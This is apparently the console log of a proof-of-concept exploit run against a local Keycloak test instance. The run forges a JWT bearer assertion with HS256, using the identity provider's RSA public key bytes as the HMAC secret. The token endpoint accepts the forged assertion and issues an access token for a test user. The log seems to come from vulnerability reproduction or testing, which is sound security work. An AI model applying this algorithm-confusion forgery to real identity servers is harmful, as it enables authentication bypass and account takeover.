=== Exploit against vulnerable Keycloak (keycloak-vuln-cve11800) === Admin token obtained. Create realm: 201 Realm issuer: http://localhost:8080/realms/test-realm RSA key pair generated. DER bytes: 294 Create IdP: 201 Create client: 201 Create user: 201 Forged JWT header: {"alg": "HS256", "typ": "JWT"} Forged JWT payload: {"jti": "be8c3379-cf2f-4c40-8513-e397e3fac0db", "iss": "https://authorization-grant-issuer", "sub": "basic-user-id", "aud": "http://localhost:8080/realms/test-realm", "exp": 1783266061, "iat": 1783265761} HMAC secret = RSA public key DER bytes (294 bytes) Submitting HS256 assertion to token endpoint... Response status: 200 *** vulnerable: HS256 assertion ACCEPTED! Access token received. *** Token subject: f97f34a8-eb71-45c1-b2d9-f1fe09e6b993 Token preferred_username: basic-user Token azp (client): test-app